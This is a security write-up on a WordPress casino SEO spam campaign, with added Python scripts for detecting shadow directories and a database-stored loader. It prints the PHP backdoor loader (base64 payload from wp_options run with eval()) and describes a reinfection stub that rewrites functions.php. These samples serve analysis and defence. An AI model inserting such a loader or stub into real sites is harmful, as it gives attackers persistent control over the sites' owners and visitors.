Cybercriminals are increasingly compromising websites to inject malicious links and boost their own search engine rankings through elaborate blackhat SEO techniques.
This campaign centers on online casino spam, which has become the most common category of spam content found on compromised websites.
The attackers exploit weaknesses in WordPress installations to plant spam content promoting online casinos, particularly those targeting regions where gambling is heavily regulated.
The attackers use several techniques to stay persistent and avoid detection. They hijack legitimate pages by creating physical directories whose names match the pages' permalink slugs, so the original content is effectively replaced by spam landing pages.
When a visitor or search engine requests one of those pages, the web server serves the counterfeit directory instead, which is filled with links to unwanted casino sites.
This works because Apache and Nginx check the filesystem for a matching file or directory before handing the request to WordPress's rewrite rules.
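A defender can check for this directly: list the document root and flag any top-level directory whose name matches a WordPress permalink slug. The script below is an added example, not part of the Sucuri write-up or of WordPress itself; the document root layout, the slugs and the shadow directory it builds are constructed for the demo. It distinguishes a directory that carries its own index file (served in place of the page) from an empty one (which still stops the request from reaching WordPress under Apache's `RewriteCond %{REQUEST_FILENAME} !-d` and Nginx's `try_files $uri $uri/ /index.php`).

```python
"""Added example, not part of the Sucuri write-up or any WordPress code:
flag directories in a WordPress document root whose names collide with
permalink slugs. Paths and slugs below are constructed for the demo."""
import os
import tempfile

# Directories a stock WordPress install ships with (assumption: default layout).
KNOWN_DIRS = {"wp-admin", "wp-content", "wp-includes"}
INDEX_NAMES = ("index.php", "index.html", "index.htm")


def find_shadow_dirs(docroot, slugs):
    """Return sorted (name, serves_index) pairs for top-level directories
    that share a name with a permalink slug. serves_index is True when the
    directory holds an index file the web server would serve instead of
    the WordPress page; False means the directory merely blocks the page."""
    hits = []
    for name in os.listdir(docroot):
        path = os.path.join(docroot, name)
        if not os.path.isdir(path) or name in KNOWN_DIRS or name not in slugs:
            continue
        serves_index = any(os.path.isfile(os.path.join(path, i)) for i in INDEX_NAMES)
        hits.append((name, serves_index))
    return sorted(hits)


def build_demo_docroot():
    """Create a throwaway docroot for the demo: the stock wp-content tree,
    a shadow directory for the slug 'about-us' carrying its own index.php,
    and an empty directory named after the slug 'contact'."""
    root = tempfile.mkdtemp(prefix="wp-demo-")
    os.makedirs(os.path.join(root, "wp-content", "themes", "demo"))
    os.makedirs(os.path.join(root, "about-us"))
    with open(os.path.join(root, "about-us", "index.php"), "w") as fh:
        fh.write("<?php /* constructed spam landing page */ ?>\n")
    os.makedirs(os.path.join(root, "contact"))
    return root


# Constructed stand-in for the slugs WordPress reports for published pages
# (on a live site: `wp post list --post_type=page --field=post_name`).
DEMO_SLUGS = {"about-us", "contact", "blog"}


if __name__ == "__main__":
    for name, serves_index in find_shadow_dirs(build_demo_docroot(), DEMO_SLUGS):
        verdict = "serves its own index file" if serves_index else "blocks the WordPress page"
        print(f"/{name}/ {verdict}")
```

On a real site, feed `find_shadow_dirs` the document root and the slug list from WP-CLI; any hit is either an attacker-created directory or a legitimate directory that is silently masking a page, and both deserve a look.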
Researchers at Sucuri discovered a notably complex variant of this malware that features several layers of redundancy.
The malicious code is placed in both theme and plugin files so that it survives even if one copy is discovered.
Rather than creating easily spotted spam directories, this variant hides its payload in the WordPress database under an innocuous-looking option name.
Multi-Layered Infection Mechanism
The infection proceeds through clever alterations to the database and dynamic content retrieval.
Researchers identified harmful code integrated at the bottom of the theme’s functions.php file.
The code fetches a base64-encoded payload from the database using the option name wp_footers_logic and executes it via PHP's eval() function:

```php
// Loader appended to the theme's functions.php: read the stored payload,
// decode it and execute it.
$cloak = get_option('wp_footers_logic');
if ($cloak) {
    $decoded = base64_decode($cloak);
    eval($decoded);
}
```
If eval() is disabled, the malware writes the payload to wp-content/cache/style.dat as a fallback. The decoded payload inspects incoming requests for specific URL paths and checks whether spam content for them is already cached.
When triggered, it fetches content from attacker-controlled domains such as browsec[.]xyz. To maintain persistence, the attackers embed reinfection code in additional plugin files; this code periodically checks for its own markers.
If the markers are missing, the code re-inserts the malicious loader into the theme's functions.php file and into the main file of the first active plugin, a level of persistence characteristic of advanced SEO spam campaigns.
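The indicators described above (a get_option() call on wp_footers_logic, eval() fed by base64_decode(), a reference to style.dat, and a stub that writes back into functions.php) translate into a simple scan of theme and plugin source plus the wp_options table. The script below is an added example and is not Sucuri's tooling; only the option name wp_footers_logic and the path wp-content/cache/style.dat come from the write-up, while the sample PHP files and option rows are constructed. It also flags any wp_options row whose value is strict base64 that decodes to PHP, which catches the same loader stored under a different option name.

```python
"""Added example, not Sucuri's tooling: scan PHP source and wp_options rows
for the loader pattern described in the write-up. Sample files and option
rows are constructed; only wp_footers_logic and style.dat come from the page."""
import base64
import binascii
import re

SUSPICIOUS_OPTION = "wp_footers_logic"          # from the write-up
FALLBACK_FILE = "wp-content/cache/style.dat"    # from the write-up

EVAL_RE = re.compile(r"\beval\s*\(")
PHP_MARKERS = ("<?php", "eval(", "$_GET", "$_POST", "$_SERVER", "file_get_contents(")


def looks_like_php_payload(value):
    """True when a string is strict base64 and decodes to text containing
    PHP markers, which is how the loader stores its payload in wp_options."""
    try:
        raw = base64.b64decode(value, validate=True)
    except (binascii.Error, ValueError):
        return False
    text = raw.decode("utf-8", errors="ignore")
    return any(marker in text for marker in PHP_MARKERS)


def scan_php(source):
    """Return the reasons a single PHP file looks like part of this loader."""
    reasons = []
    if SUSPICIOUS_OPTION in source:
        reasons.append("references option " + SUSPICIOUS_OPTION)
    if EVAL_RE.search(source):
        if "base64_decode(" in source:
            reasons.append("eval() fed by base64_decode()")
        else:
            reasons.append("eval() present")
    if FALLBACK_FILE.rsplit("/", 1)[-1] in source:
        reasons.append("references fallback file " + FALLBACK_FILE)
    if "file_put_contents(" in source and "functions.php" in source:
        reasons.append("writes to functions.php (reinfection stub)")
    return reasons


def scan_files(files):
    """files maps relative path -> PHP source. Returns sorted (path, reason) pairs."""
    return sorted((path, reason) for path, source in files.items() for reason in scan_php(source))


def scan_options(rows):
    """rows are (option_name, option_value) pairs from wp_options. Returns the
    names of rows that use the known option name or hold a base64 PHP payload."""
    return [name for name, value in rows
            if name == SUSPICIOUS_OPTION or looks_like_php_payload(value)]


# Constructed samples: a theme functions.php carrying the loader from the
# write-up, a clean plugin main file, and a plugin helper with a reinfection stub.
SAMPLE_FILES = {
    "wp-content/themes/demo/functions.php": (
        "<?php\n"
        "add_theme_support('post-thumbnails');\n"
        "$cloak = get_option('wp_footers_logic');\n"
        "if ($cloak) {\n"
        "    $decoded = base64_decode($cloak);\n"
        "    eval($decoded);\n"
        "}\n"
    ),
    "wp-content/plugins/demo-plugin/demo-plugin.php": (
        "<?php\n"
        "/* Plugin Name: Demo */\n"
        "function demo_init() { register_post_type('demo'); }\n"
        "add_action('init', 'demo_init');\n"
    ),
    "wp-content/plugins/demo-plugin/includes/helper.php": (
        "<?php\n"
        "$target = get_template_directory() . '/functions.php';\n"
        "if (strpos(file_get_contents($target), 'wp_footers_logic') === false) {\n"
        "    file_put_contents($target, \"/* loader stub */\", FILE_APPEND);\n"
        "}\n"
    ),
}

SAMPLE_OPTIONS = [
    ("siteurl", "https://example.com"),
    ("wp_footers_logic", base64.b64encode(b"if (isset($_GET['p'])) { echo 'constructed'; }").decode()),
    ("blogdescription", "Just another site"),
]


if __name__ == "__main__":
    for path, reason in scan_files(SAMPLE_FILES):
        print(f"{path}: {reason}")
    print("suspicious options:", scan_options(SAMPLE_OPTIONS))
```

Because the reinfection stub lives in a different file from the loader it restores, cleaning functions.php alone is not enough: run the file scan over every theme and plugin directory, remove the flagged option rows, and delete wp-content/cache/style.dat before the next request can re-trigger the loader.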